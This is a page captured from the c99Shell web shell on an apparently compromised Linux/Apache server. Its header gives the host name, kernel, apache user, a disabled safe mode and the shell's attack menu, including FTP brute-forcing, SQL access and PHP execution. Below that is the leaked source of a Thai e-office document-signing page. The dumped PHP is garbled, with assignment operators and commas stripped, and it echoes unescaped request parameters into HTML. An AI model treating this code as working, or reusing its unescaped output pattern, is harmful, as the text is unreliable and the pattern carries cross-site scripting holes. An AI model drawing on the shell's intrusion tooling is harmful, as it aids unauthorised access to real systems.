!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/eoffice/admin/   drwxr-xr-x
Free 50.91 GB of 127.8 GB (39.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     signDoc.php (31.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
include_once 
"../class/clsTable.php";
include_once 
"../class/clsDepartment.php";
include_once 
"../class/clsPerson.php";
include_once 
"../link/function.php";
include_once 
"../class/clsDocLinePosition.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsReceiveSendType.php";
include_once 
"../class/clsDocType.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsDocSpeedLevel.php";
include_once 
"../class/clsDocSecreLevel.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsDocWSign.php";
include_once 
"funct.php";
include_once 
"../link/keyThai.php";
include_once 
"../class/clsNoticeEditDoc.php";
include_once 
"../class/clsDocInboxStaff.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);
$time_startpage microtime_float();
$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oDlc = new DocLineConfig($oC);
$oDlc2 = new DocLineConfig($oC);
$oDlc9 = new DocLineConfig($oC);
$oDlp = new docLinePosition($oC);
$oDlp1 = new docLinePosition($oC);
$oRSt = new receiveSendType($oC);
$oDt = new doctype($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDoc = new Documents($oC);
$oDoc1 = new Documents($oC);
$oDoc2 = new Documents($oC);
$oDoc3 = new Documents($oC);
$oDoc4 = new Documents($oC);
$oDoc5 = new Documents($oC);
$oDoc7 = new Documents($oC);
$oDsl = new DocSpeedLevel($oC);
$oDcl = new DocSecretLevel($oC);
$oDsl2 = new DocSpeedLevel($oC);
$oDcl2 = new DocSecretLevel($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs4 = new DocReceiveSend($oC);
$oRs5 = new DocReceiveSend($oC);
$oRs6 = new DocReceiveSend($oC);
$oRs7 = new DocReceiveSend($oC);
$oNe = new NoticeEditDoc($oC);
$oDbxS = new DocInboxStaff($oC);
$oDbxS1 = new DocInboxStaff($oC);
$oDbxS3 = new DocInboxStaff($oC);
$oDbxS2 = new DocInboxStaff($oC);

$MaxDocGroup=$oDP->SearchMaxDocGroup();
$InputThai=$oSys->SearchByInputThai();
$oDws = new docwsign($oC);
if(
$_SESSION['DLCID'] && $_SESSION['one_position']!="1"){ include_once "selectposition.php";        

$oDlc->SearchByKey($_SESSION['DLCID']); $oDlc->GetRecord();
if(
$_SESSION['DLCIDSECOND']=="Y"){
    
$oDlc9->SearchByKey($_SESSION['DLCIDSECONDID']); $oDlc9->GetRecord(); 
    
$mypersonId=$oDlc9->personId;
}else{
    
$mypersonId=$oDlc->personId;
}    
?>
<html>
<head>
<script language="javascript" src="../source/calendarDateInput.js"></script>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<script src="getinfo.js"></script>
</head>
<body>
<table  width="100%"  align="center">
<tr><td >
<fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="signDoc.php">ลงนาม</a>
    </font></legend>
    <form name="gg"  METHOD="POST" >
          <table align="center" width="98%" >
        <tr>
            <td width="73%" height="25"><img src="../picture/official_letter.gif"   border="0" > 
              <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="3"><strong> 
              ลงนามหนังสือ</strong></font> </td>
          <td width="22%" align="right">&nbsp;</td>
          <td width="5%" align="right" >&nbsp;</td>
        </tr>
        <tr>
          <td colspan="3"><hr color="#000099"></hr>
          </td>
        </tr>
        <tr><td colspan="3" align="right">
        <?  if($oDlp1->DlpPID==0){ ?>
            <b>รายการหนังสือในโฟลเดอร์</b>
            <select name="folderstaff2" onChange="presign()" id="folderstaff2">
            <option value="all" <? if($folderstaff2==""){ echo "selected";   }?>>แสดงทั้งหมด</option>
            <? $oDbxS->SearchByNoDelFolder($DLCID,$oDlc->DlpID,$oDlc->deptId,$oDlc->docGroup);
                    while(
$oDbxS->GetRecord()){
            
?>
            <option value="<? echo $oDbxS->DocInboxSID?><? if($folderstaff2==$oDbxS->DocInboxSID){ echo "selected";   }?>><? echo $oDbxS->InboxName?></option>
                    <? ?>
            </select>
            <? if($oDlc->DlcSign=="Y"){  ?><input type="hidden" name="forfolderstaff2" value="<? echo 'DIbHeader'?>" id="forfolderstaff2"><? }else{ ?><input type="hidden" name="forfolderstaff2" value="<? echo 'DIbStaff'?>" id="forfolderstaff2"><? ?>
            <? }else{  ?><input type="hidden" name="folderstaff2" value="" id="folderstaff2"><input type="hidden" name="forfolderstaff2" value="" id="forfolderstaff2"><? }?>
        </td></tr>
        <tr><td colspan="3" align="right">
        <strong>ค้นหาหนังสือ</strong> <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">(เรื่อง/ว่าด้วย)&nbsp;<input name="searchNamePre"  id="searchNamePre" type="text" size="25" value="<? echo a2th($searchNamePre); ?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','searchNamePre')">&nbsp;(ที่)</font>&nbsp;<input name="searchNoPre" id="searchNoPre" type="text" size="20" value="<? echo a2th($searchNoPre); ?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','searchNoPre')"><br><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">จาก/ที่มา (ต้นเรื่อง)</font> <input name="searchDeptPre"  id="searchDeptPre" type="text" size="25" value="<? echo a2th($searchDeptPre); ?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','searchDeptPre')">
        
              </td>
          </tr>
        <tr valign="middle"><td align="right" valign="middle"><input name="selectpredocdate" id="selectpredocdate" type="checkbox" value="1" onClick="checkcheckbox(1);" <? if($selectpredocdatevalue=="1"){  echo "checked"; }?>>&nbsp;<input name="selectpredocdatevalue" id="selectpredocdatevalue" type="hidden" value=<? echo $selectpredocdatevalue;  ?>><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">ลงวันที่</font></td><td><? if($searchpredocdate==""){  ?><script>DateInput('searchpredocdate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script><? }else{   ?><script>DateInput('searchpredocdate', true, 'DD/MM/YYYY','<?php echo splitDateDb($searchpredocdate,"/");?>');</script><? ?></td><td><input name="searchNamesubPre"  id="searchNamesubPre"type="button" value="ค้นหา" onClick="presign()"></td></tr>
      </table>
        <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2"><strong> 
        &nbsp;&nbsp;รายการหนังสือที่ยังไม่ได้ลงนาม</strong></font> 
        <table width="99%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" style="border-collapse:collapse">
      <tr height=22>
      <? $p=bgForSendPage($DtID);?>
      <td width="13%" align="center" background="<? echo $p?>"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>ที่ ลงวันที่</strong></font></td>
      <td width="15%" align="center" background="<? echo $p?>"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>จาก/ที่มา&nbsp;(ต้นเรื่อง)</strong></font></td>
      <td width="29%" align="center" background="<? echo $p?>"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>เรื่อง/ว่าด้วย (ชนิดหนังสือ)</strong></font></td>
       <td width="2%" align="center" background="<? echo $p?>"><img src="../picture/rapid0.jpg"   border="0" ></td>
          <td width="2%" align="center" background="<? echo $p?>"><img src="../picture/secret0.jpg"   border="0" ></td>
          </tr>
           <? //-------------------------other doc------------------------------------------------------------------------------------

                
$oDlp1->SearchByKey($oDlc->DlpID);  $oDlp1->GetRecord();
                if(
$oDlp1->DlpPID!="0"){   
                                
$DlcPS2=$DLCID;
                                
$buddy=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId);
                                
$numRow2=$oDoc7->SearchCountSignDocR($MaxDocGroup,$DLCID,$DlcPS2,$searchpredocdate,$selectpredocdatevalue,$buddy,$folderstaff2,$forfolderstaff2,th2a($searchNamePre),th2a($searchNoPre),th2a($searchDeptPre));
                }else{
                                
$DlcPS2=$oDlc2->SearchDlc2($oDlc->DlcSeq,$oDlp1->DlpPID,$oDlc->deptId);
                                
$numRow2=$oDoc7->SearchCountSignDoc($MaxDocGroup,$DLCID,$DlcPS2,$searchpredocdate,$selectpredocdatevalue,$folderstaff2,$forfolderstaff2,th2a($searchNamePre),th2a($searchNoPre),th2a($searchDeptPre));
                }
                
        
$i=0;
        if(
$numRow2!=0){                
                                
$total_page2 = (int)($numRow2/$GLOBALS['PAGE_SIZE']);
                                if((
$numRow2%$GLOBALS['PAGE_SIZE']) != 0)
                                    
$total_page2++;
        
                                if(
$page_id2!=""){   if($page_id2>$total_page2){  $page_id2 1$start2 0; }}else{   $page_id2 1$start2 0;}
                                if(isset(
$page_id2))
                                    
$start2 $GLOBALS['PAGE_SIZE']*($page_id2-1);
                                else {
                                    
$page_id2 1;
                                    
$start2 0;
                                }
                                
                                                
                if(
$oDlp1->DlpPID!="0"){ 
                    
$oDoc->SearchSignDocRlimit2($MaxDocGroup,$DLCID,$DlcPS2,$start2,$GLOBALS['PAGE_SIZE'],$searchpredocdate,$selectpredocdatevalue,$buddy,$folderstaff2,$forfolderstaff2,th2a($searchNamePre),th2a($searchNoPre),th2a($searchDeptPre));
                }else{    
                    
$oDoc->SearchSignDoclimit($MaxDocGroup,$DLCID,$DlcPS2,$start2,$GLOBALS['PAGE_SIZE'],$searchpredocdate,$selectpredocdatevalue,$folderstaff2,$forfolderstaff2,th2a($searchNamePre),th2a($searchNoPre),th2a($searchDeptPre));
                }                
    
                    
                  while(
$oDoc->GetRecord()){ 
                                
$noticedoc="";
                                 
$oNe->SearchNoticeEditDocStatus($oDoc->DocID,$oDoc->DrsID,1);
                                 if(
$oNe->GetRecord()){ 
                                        
$noticedoc="<b><font color=\"#FF0000\"><แจ้งแก้ไข></font></b>";
                                 }
                    if((
$i%2) == 0)   
                                              echo 
"<tr bgcolor=\"#FFFFFF\" height=22 >";
                                        else
                                              echo 
"<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_16"]."\"  height=22 align=\"left\">";
          
?>
       <td>&nbsp;<? if($oDoc->DtID!="15"){  echo $oDoc->DocNo;  }else{  echo '-'; }?><br>&nbsp;<? echo abbreDate2($oDoc->DocDate,'/'); ?></td>
      <td align="left">
      <? 
              
if($oDoc->DtID=="1" || $oDoc->DtID=="2" || $oDoc->DtID=="14"){
                        echo 
"&nbsp;".$oDoc->DocFrom."<br>";
            }else{
                if(
$oDoc->DocPID=="0"){
                        
$oDlc2->SearchByKey($oDoc->DlcID); $oDlc2->GetRecord();
                        
$oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();                        
                }else{
                        
$oD_DlcID=$oDoc4->SearchDlcID($oDoc->DocPID); 
                        
$oDlc2->SearchByKey($oD_DlcID); $oDlc2->GetRecord();
                        
$oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();
                    
                }
                        echo 
"&nbsp;".$oDoc->DocFrom."<br>";
                        echo 
"&nbsp;(".$oDlp->DlpName.")";                
            }
      
?>
      </td>
      <td align="left">&nbsp;<? echo showeDoc($oDoc->eDoc); ?><a href="showSignDoc.php?page_id2=<? echo $page_id2;?>&DocID=<?php echo $oDoc->DocID;?>&DrsID=<? echo $oDoc->DrsID?>&searchpredocdate=<? echo $searchpredocdate;?>&selectpredocdatevalue=<? echo $selectpredocdatevalue;?>&folderstaff2=<? echo $folderstaff2;?>&forfolderstaff2=<? echo $forfolderstaff2;?>&searchNamePre=<? echo $searchNamePre;?>&searchNoPre=<? echo $searchNoPre;?>&searchDeptPre=<? echo $searchDeptPre;?>"><?  echo $oDoc->DocSubject;  ?></a>
      &nbsp; <font color="<?php echo $GLOBALS["COLOR_FONT_5"]; ?>" size="2"><? $oDt->SearchByKey($oDoc->DtID); $oDt->GetRecord(); echo "(".$oDt->DtName.")"?></font>
      &nbsp;
      <?  if($oDlp1->DlpPID!="0"){   if($DLCID==$oDoc->DlcID){   echo "&nbsp;<font color=\"#029b0a\"><storng>[รักษาการ]</strong></font>"; }} ?>
     <?  if($oDlp1->DlpPID=="0"){   if($DlcPS2==$oDoc->DlcID){   echo "&nbsp;<font color=\"#029b0a\"><storng>[รักษาการ]</strong></font>"; }} ?>
          <? if($oDoc->DrsWSign=='Y'){ echo " (หนังสือ".$GLOBALS['DOCFORSIGNNAME'].")"; } ?>
         <? echo $noticedoc;?>
      </td>
      <td align="center"><? echo searchPicDocSpeedLevel($oDoc->DslID); ?></td>
      <td align="center"><? echo searchPicDocSecretLevel($oDoc->DclID); ?></td>
      </tr>
          <? $i++; } } ?>
      </table>
        <table width="99%" align="center" border=0 cellpadding="0" cellspacing="0" bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_13'];?>"  height="22">
        <? if($i=="0"){?>
          <tr height=22><td align="center" bgcolor="#FFFFFF" colspan="5"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">** ไม่มีรายการหนังสือที่ลงนาม **</font></td></tr>
          <tr height=22 bgcolor="#DADADA"><td align="right" colspan="5">&nbsp;</td></tr>
          <? }else{  ?>
                                                     <tr height=22 bgcolor="#DADADA"><td align="right" colspan="5"><strong>หน้า-&gt;</strong>
<?php
                    
for ($num=1$num<=$total_page2$num++) {    
                        if(
$num == $page_id2){
                            echo  
a2th($num)." ";
                        }else {
?>
                            <a href="signDoc.php?page_id2=<?php echo $num;?>&searchpredocdate=<? echo $searchpredocdate;?>&selectpredocdatevalue=<? echo $selectpredocdatevalue;?>&folderstaff2=<? echo $folderstaff2;?>&forfolderstaff2=<? echo $forfolderstaff2;?>&searchNamePre=<? echo $searchNamePre;?>&searchNoPre=<? echo $searchNoPre;?>&searchDeptPre=<? echo $searchDeptPre;?>"><?php echo '[ 'a2th($num).' ]'; if($num==14){echo "<br>";} ?></a>
<?php
                        
}
                    }
?>
&nbsp;&nbsp;</td></tr>
        <? ?>
       <tr height=22 bgcolor="#FFFFFF">
          <td colspan="5" valign="bottom"><br>
          <hr color="#000099"></hr></td>
        </tr>
      </table> 
      </form>
      <form name="ff"  METHOD="POST" action="signDoc.php">
      <br><? if($monthe==""){  $monthe=Date('m'); } if($searchYear==""){  $searchYear=Date('Y')+543; } ?>
      <table  width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" style="border-collapse:collapse"> 
          <tr height=27 bgcolor="#FFFFFF" ><td align="left" >&nbsp;
           <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2"><strong> 
          <a id="openshow" <? if($flagshow=="1"){   ?>style="display:none; cursor:pointer"  <? }else{ ?> style="display:''; cursor:pointer" <? }?>   onclick="up_downList('<? if($flagshow=="1"){   echo "up"; }else{  echo "up"; }?>')"><img src="../picture/downshow.gif" title="แสดง"  border="0" >&nbsp;<U>แสดงรายการหนังสือที่ลงนาม <? echo $GLOBALS['DOCFORSIGNNAME'];?> แล้วทั้งหมด</U></a>
          <a  id="closeshow" <? if($flagshow=="1"){   ?>style="display:''; cursor:pointer" <? }else{ ?>style="display:none; cursor:pointer"  <? }?> title="ซ่อน" onclick="up_downList('<? if($flagshow=="1"){  echo "down";  }else{  echo "down";  }?>')"><img src="../picture/downshow.gif" title="ซ่อน"  border="0" >&nbsp;<U>ซ่อนรายการหนังสือที่ลงนาม <? echo $GLOBALS['DOCFORSIGNNAME'];?> แล้วทั้งหมด</U></a>
          </strong></font>
           <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"   id="showtable" <? if($flagshow=="1"){   ?>style="display:''; border-collapse:collapse" <? }else{ ?>style="display:none; border-collapse:collapse"  <? }?>>
           <tr><td>
          <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"   style="border-collapse:collapse">
        <tr><td colspan="4" align="right">
        <?  if($oDlp1->DlpPID==0){ ?>
            <b>รายการหนังสือในโฟลเดอร์</b>
            <select name="folderstaff" onChange="ShowInfoSign('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>','<? echo $InputThai?>')"  id="folderstaff">
            <option value="all" <? if($folderstaff==""){ echo "selected";   }?>>แสดงทั้งหมด</option>
            <? $oDbxS->SearchByNoDelFolder($DLCID,$oDlc->DlpID,$oDlc->deptId,$oDlc->docGroup);
                    while(
$oDbxS->GetRecord()){
            
?>
            <option value="<? echo $oDbxS->DocInboxSID?><? if($folderstaff==$oDbxS->DocInboxSID){ echo "selected";   }?>><? echo $oDbxS->InboxName?></option>
                    <? ?>
            </select>
            <? if($oDlc->DlcSign=="Y"){  ?><input type="hidden" name="forfolderstaff" value="<? echo 'DIbHeader'?>" id="forfolderstaff"><? }else{ ?><input type="hidden" name="forfolderstaff" value="<? echo 'DIbStaff'?>" id="forfolderstaff"><? ?>
            <? }else{  ?><input type="hidden" name="folderstaff" value="" id="folderstaff"><input type="hidden" name="forfolderstaff" value="" id="forfolderstaff"><? }?>
        </td></tr>
          
          <tr><td align="right" colspan="4">
          <? if($oDlp1->DlpPID!="0"){   ?><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">รายการหนังสือ</font> 
          <select name="s" onChange="ShowInfoSign('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>','<? echo $InputThai?>')" id="s">
            <option value="1" <? if($s=="" || $s=="1"){ echo "selected";   }?>>ที่ลงนามแล้ว</option>
            <option value="2" <? if($s=="2"){ echo "selected";   }?>>ที่<? echo $GLOBALS['DOCFORSIGNNAME'];?></option>
            </select>
          <br>
          <? }else{ ?><input type="hidden" name="s" id="s" value="<? echo $s?>"> <?  ?>
          <b>ค้นหาหนังสือ</b> <font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">(เรื่อง/ว่าด้วย)</font>&nbsp;<input name="searchName"  id="searchName" type="text" size="25" value="<? echo a2th($searchName); ?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','searchName')">&nbsp;<font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">&nbsp;(ที่)</font>&nbsp;<input name="searchNo"  id="searchNo" type="text" size="20" value="<? echo a2th($searchNo); ?>" onkeypress="return chkNoKey(event)" onKeyUp="CheckInput('<? echo $InputThai?>','searchNo')">&nbsp;&nbsp;<br></font></td></tr>
                        <tr><td colspan="4">&nbsp;</td></tr>
                 <tr><td>&nbsp;</td><td colspan=3><input name="selectdocdate" id="selectdocdate3" type="radio" value="3" checked onClick="checkradio(3)" <? if($selectdocdatevalue=="3"){  echo "checked"; }?>>&nbsp;<font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">(ค้นหาทั้งหมด)</font></td></tr
                <tr><td width="58%">&nbsp;</td><td align="left" height="25"><input name="selectdocdate" id="selectdocdate1" type="radio" value="1" checked onClick="checkradio(1)" <? if($selectdocdatevalue=="1" || $selectdocdatevalue==""){  echo "checked"; }?>>&nbsp;<font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">(ประจำเดือน) </font></td><td>    <select name="monthe"  id="monthe" onChange="On_Month('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>','<? echo $InputThai?>')">
                <option value="01" <? if($monthe=="01"){ echo "selected";   }?>>ม.ค.</option>
                <option value="02" <? if($monthe=="02"){ echo "selected";   }?>>ก.พ.</option>
                <option value="03" <? if($monthe=="03"){ echo "selected";   }?>>มี.ค.</option>
                <option value="04" <? if($monthe=="04"){ echo "selected";   }?>>เม.ย.</option>
                <option value="05" <? if($monthe=="05"){ echo "selected";   }?>>พ.ค.</option>
                <option value="06" <? if($monthe=="06"){ echo "selected";   }?>>มิ.ย.</option>
                <option value="07" <? if($monthe=="07"){ echo "selected";   }?>>ก.ค.</option>
                <option value="08" <? if($monthe=="08"){ echo "selected";   }?>>ส.ค.</option>
                <option value="09" <? if($monthe=="09"){ echo "selected";   }?>>ก.ย.</option>
                <option value="10" <? if($monthe=="10"){ echo "selected";   }?>>ต.ค.</option>
                <option value="11" <? if($monthe=="11"){ echo "selected";   }?>>พ.ย.</option>
                <option value="12" <? if($monthe=="12"){ echo "selected";   }?>>ธ.ค.</option>
              </select>
                    &nbsp;<input name="searchYear"  id="searchYear" type="text" size="5" maxlength="5" value=<? if($searchYear!=""){  echo a2th($searchYear);  }else{  echo a2th(Date('Y')+543); } ?> onKeyUp="On_Year('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>','<? echo $InputThai?>')" onkeypress="return isNumberKey('<? echo $InputThai?>',event)">
                          </td><td>&nbsp;</td></tr>
                <tr valign="middle"><td>&nbsp;</td><td width="20%" align="left" valign="middle"><input name="selectdocdate" id="selectdocdate2" type="radio" value="2" onClick="checkradio(2)" <? if($selectdocdatevalue=="2"){  echo "checked"; }?>>&nbsp;<input name="selectdocdatevalue" id="selectdocdatevalue" type="hidden"  value=<? echo $selectdocdatevalue?>><font color="<?php echo $GLOBALS["COLOR_FONT_2"]; ?>" size="2">(วันที่ของหนังสือ)</font></td><td width="18%"><? if($searchdocdate==""){  ?><script>DateInput('searchdocdate', true, 'DD/MM/YYYY','<?php echo getNowDateFw2();?>');</script><? }else{   ?><script>DateInput('searchdocdate', true, 'DD/MM/YYYY','<?php echo splitDateDb($searchdocdate,"/");?>');</script><? ?></td><td width="4%"><input name="searchNamesub" type="button" value="ค้นหา" onClick="ShowInfoSign('<?php echo $DLCID?>','<?php echo $MaxDocGroup?>','<?php echo $DlcPS2;  ?>','<? echo $InputThai?>')"></td></tr>
                    
            </table>
            <div id="showselect"><!-- ajax showSelectSignDoc.php-->
            <table width="100%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" style="border-collapse:collapse" >
             <?  $flagshow=1;   $q=bgForSendPage2($DtID);?>
              <tr height=22>
              <td width="15%" align="center" background="<? echo $q?>"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>ที่ ลงวันที่</strong></font></td>
      <td width="10%" align="center" background="<? echo $q?>"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>จาก/ที่มา&nbsp;(ต้นเรื่อง)</strong></font></td>
      <td width="26%" align="center" background="<? echo $q?>"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>เรื่อง/ว่าด้วย (ชนิดหนังสือ)</strong></font></td>
       <td width="10%" align="center" background="<? echo $q?>"><font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>วันที่ลงนาม</strong></font></td>
        </tr>
          
          <?
                          
//--------------------------------find count
                         
if($selectdocdatevalue=="3" && $searchName=="" && $searchNo=="" && $searchTypeNoF=="" && $searchTypeNoT==""){
                            
$cannotsearch=1
                         }

                        
$numrow=0;
            if(
$cannotsearch!='1'){
                        if(
$s=="2"){    
                            
$numRow =$oRs4->SearchCountByDocforWSign($MaxDocGroup,$DLCID,$DlcPS2,$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo),$searchdocdate,$selectdocdatevalue,$folderstaff,$forfolderstaff);
                        }else{
                            
$numRow =$oRs4->SearchCountByDocSign($MaxDocGroup,$DLCID,$DlcPS2,$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo),$searchdocdate,$selectdocdatevalue,$folderstaff,$forfolderstaff);
                        }
            }else{
                
$numRow=0;        
            }
            
$z=0;
        if(
$numRow!=0){                            
                        
$total_page = (int)($numRow/$GLOBALS['PAGE_SIZE']);
                        if((
$numRow%$GLOBALS['PAGE_SIZE']) != 0)
                            
$total_page++;

                        if(
$page_id!=""){   if($page_id>$total_page){  $page_id 1$start 0; }}else{   $page_id 1$start 0;}
                        if(isset(
$page_id))
                            
$start $GLOBALS['PAGE_SIZE']*($page_id-1);
                        else {
                            
$page_id 1;
                            
$start 0;
                        }

            
            if(
$s=="2"){      
                    
$oRs5->SearchByDocforWSign($MaxDocGroup,$DLCID,$DlcPS2$start$GLOBALS['PAGE_SIZE'],$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo),$searchdocdate,$selectdocdatevalue,$folderstaff,$forfolderstaff);        
            }else{ 
                    
$oRs5->SearchByDocSign($MaxDocGroup,$DLCID,$DlcPS2$start$GLOBALS['PAGE_SIZE'],$monthe,th2a($searchYear),th2a($searchName),th2a($searchNo),$searchdocdate,$selectdocdatevalue,$folderstaff,$forfolderstaff);
            }
                
            while(
$oRs5->GetRecord()){ 
                            if((
$z%2) == 0)   
                                              echo 
"<tr bgcolor=\"#FFFFFF\" height=22 >";
                                        else
                                              echo 
"<tr bgcolor=\"".$GLOBALS["COLOR_BG_TD_16"]."\"  height=22>";
            
?>
         <td width="13%">&nbsp;<? if($oRs5->DtID!="15"){  echo a2th($oRs5->DocNo);  }else{  echo '-'; }?><br>&nbsp;<? echo abbreDate2($oRs5->DocDate,'/'); ?></td>
      <td width="18%" >
      <? 
          
if($oRs5->DtID=="1" || $oRs5->DtID=="2" || $oRs5->DtID=="14"){
                        echo 
"&nbsp;".a2th($oRs5->DocFrom)."<br>";
        }else{
              if(
$oRs5->DocPID=="0"){
                    
$oDlc2->SearchByKey($oRs5->DlcID); $oDlc2->GetRecord();
                    
$oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();
                    echo 
"&nbsp;".a2th($oRs5->DocFrom)."<br>";
                    echo 
"&nbsp;(".$oDlp->DlpName.")";                    
            }else{
                    
$oD_DlcID=$oDoc5->SearchDlcID($oRs5->DocPID);
                    
$oDlc2->SearchByKey($oD_DlcID); $oDlc2->GetRecord();
                    
$oDlp->SearchByKey($oDlc2->DlpID);  $oDlp->GetRecord();                
                    echo 
"&nbsp;".$oRs5->DocFrom."<br>";
                    echo 
"&nbsp;(".$oDlp->DlpName.")";                    
            }
        }
      
?>
      </td>
                          <td width="30%">&nbsp;<? echo showeDoc($oRs5->eDoc); ?> <a href="showDetailSignDoc.php?page_id=<? echo $page_id;?>&DocID=<?php echo $oRs5->DocID;?>&DrsID=<? echo $oRs5->DrsID?>&flagshow=<? echo $flagshow?>&monthe=<? echo $monthe;?>&searchYear=<? echo $searchYear?>&searchName=<? echo $searchName?>&searchNo=<? echo $searchNo?>&s=<? echo $s?>&searchdocdate=<? echo $searchdocdate;?>&selectdocdatevalue=<? echo $selectdocdatevalue;?>&folderstaff=<? echo $folderstaff;?>&forfolderstaff=<? echo $forfolderstaff;?>">
                            <?  echo a2th($oRs5->DocSubject);  ?>
                            </a> &nbsp; <font color="<?php echo $GLOBALS["COLOR_FONT_5"]; ?>" size="2">
                            <? $oDt->SearchByKey($oRs5->DtID); $oDt->GetRecord(); echo "(".$oDt->DtName.")";  ?>
                            </font> &nbsp; 
                            <? if($oDlp1->DlpPID!="0"){  if($DLCID==$oRs5->DlcIDDrs){   echo "&nbsp;<font color=\"#029b0a\"><storng>[รักษาการ]</strong></font>"; }} ?>
                                <?  if($oDlp1->DlpPID=="0"){   if($DlcPS2==$oRs5->DlcIDDrs){   echo "&nbsp;<font color=\"#029b0a\"><storng>[รักษาการ]</strong></font>"; }} ?>
                            <? if($oRs5->DrsWSign=='Y'){ echo " (หนังสือ".$GLOBALS['DOCFORSIGNNAME'].")"; } ?>
                          </td>
      <td align="center"> 
      <? 
      
if($s==2){
              if(
$oRs5->signDateTime!="0000-00-00 00:00:00"){
                         list(
$DocD,$DocT) = preg_split('[ ]',$oRs5->signDateTime);
                }
        }else{
              if(
$oRs5->DrsSendDate!="0000-00-00 00:00:00"){
                         list(
$DocD,$DocT) = preg_split('[ ]',$oRs5->DrsSendDate);                    
                }        
        }
        echo 
abbreDate2($DocD,'/')."<br>".a2th($DocT);
        
?>
        </td>
          </tr>
          <?
           $z
++;  } }  ?> 
            <? if($z=="0"){?>
          <tr height=22><td align="center" bgcolor="#FFFFFF" colspan="7"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">** ไม่มีรายการหนังสือที่ลงนามแล้ว **</font></td></tr>
          <tr height=22 bgcolor="#DADADA"><td align="right" colspan="7">&nbsp;</td></tr>
          <? }else{  ?>
           <tr height=22 bgcolor="#DADADA"><td height="20" colspan="7" align="right"><strong>หน้า-&gt;</strong>
<?php 
                    
for ($num=1$num<=$total_page$num++) {    
                        if(
$num == $page_id)
                            echo 
a2th($num)." ";
                        else {
?>
